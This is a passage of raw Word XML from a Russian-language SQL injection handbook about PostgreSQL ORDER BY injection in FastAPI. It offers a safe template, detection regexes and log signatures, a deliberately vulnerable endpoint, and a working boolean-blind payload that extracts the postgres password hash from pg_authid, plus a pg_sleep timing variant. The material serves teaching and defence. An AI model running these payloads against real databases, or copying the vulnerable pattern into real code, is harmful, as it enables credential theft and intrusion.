        </w:rPr>
        <w:t xml:space="preserve">Корректный шаблон:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.get("/admin/audit-logs")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def list_audit_logs(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sort_col: int = Query(1, ge=1, le=5),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    direction: Literal["ASC", "DESC"] = Query("DESC"),</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user_id, action, target, occurred_at FROM audit_log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE occurred_at &gt; now() - interval '30 days'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY {sort_col} {direction} LIMIT 100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 sort_col гарантированно int 1..5, direction — "ASC"|"DESC"</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f-string </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY {var}</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var: str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (не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Регэксп: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY \{[a-z_]+\}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в Python f-strings без проверки типа.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запросы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY 99</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от endpoint-а с типичным select-list ≤ 10 колонок; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY (CASE ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от endpoint-а где должен быть simple sort.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Database-логи</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: повторные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY position N is not in select list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от одного IP за короткое время — column-count enumeration.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 access-log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?sort_col=1;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?sort_col=(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?sort_col=99</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — все three не должны проходить FastAPI Query(int, le=N).</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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все версии PG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column_number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> синтаксис существует с SQL92, expression в ORDER BY — с SQL99. Никакие фиксы не закрывают этот класс — application-level mis-configuration.</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via CAST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — error-канал через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY position N is not in select list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Граница: 3.2 описывает error-канал в общем; 3.14.3 — конкретный source error message.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Variant A (column-count enumeration) — prerequisite для UNION-extraction.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Variant B зависит от driver-mode.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 PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Variant B эскалирует в RCE при наличии privilege.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Variant C даёт boolean-channel через row-order.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3.14.1 LIMIT/OFFSET integer-context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — тот же class integer-context в другом clause.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3.14.4 ORDER BY (CASE WHEN)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — full expression-context, расширение Variant C.</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«SELECT» / «ORDER BY Clause» — https://www.postgresql.org/docs/current/sql-select.html#SQL-ORDERBY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Error Codes: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">22P01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORDER BY position invalid — https://www.postgresql.org/docs/current/errcodes-appendix.html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PortSwigger: «SQL injection cheat sheet» (раздел «Determining the number of columns required») — https://portswigger.net/web-security/sql-injection/cheat-sheet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OWASP: «SQL Injection Prevention Cheat Sheet» — https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html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FastAPI Docs: «Path Parameters and Numeric Validations» — https://fastapi.tiangolo.com/tutorial/path-params-numeric-validations/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.14.4 ORDER BY (CASE WHEN ...) — full expression-context</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PostgreSQL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принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">arbitrary expression</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не только column-reference или column-number. Это означает, что любой user-input, попавший в ORDER BY-position через f-string или concat, — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">полноценная SQL injection в expression-context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, эквивалентная injection в WHERE. Особенность ORDER BY-канала: ответом-индикатором служит не значение, а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">порядок строк в response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(CASE WHEN cond THEN col1 ELSE col2 END)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> сортирует rows по разным колонкам в зависимости от boolean condition — атакующий сравнивает row order до/после и читает данные побитно. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">boolean-blind канал, нативно встроенный в ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Дополнительно: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY (CASE WHEN cond THEN pg_sleep(5) ELSE 1 END)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> создаёт conditional time-delay в sorting phase (3.4 time-channel через ORDER BY).</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app/api/v1/reports.py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Query,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@router.get("/reports/orders")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def list_orders(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sort_expr: str = Query("created_at DESC"),  # ← полная свобода</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полная sort-expression от пользователя</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # (например, для admin UI с custom sort: "amount DESC, created_at ASC")</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customer_id, amount, status, created_at</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        FROM orders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE created_at &gt; now() - interval '90 days'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY {sort_expr}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT 200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Разработчик разрешил «complex sort» через user-input — типичный паттерн в admin-dashboards, где UI собирает sort-spec из нескольких колонок и направлений. Реальный mistake: не whitelist комбинаций, а свободный текст.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — три варианта</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант A — boolean-blind через row order:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /reports/orders?sort_expr=(CASE%20WHEN%20(SELECT%20substring(rolpassword,1,1)%20FROM%20pg_authid%20WHERE%20rolname='postgres')='m'%20THEN%20amount%20ELSE%20created_at%20END)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sort_expr = "(CASE WHEN (SELECT substring(rolpassword,1,1) FROM pg_authid WHERE rolname='postgres')='m' THEN amount ELSE created_at END)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. 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customer_id, amount, status, created_at FROM orders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE created_at &gt; now() - interval '90 days'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY (CASE WHEN (SELECT substring(rolpassword,1,1) FROM pg_authid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                       WHERE rolname='postgres')='m'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">              THEN amount ELSE created_at END)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIMIT 200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если первый символ password от роли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равен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'m'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, sort происходит по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">amount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (числовая колонка); иначе — по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">created_at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (timestamp). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
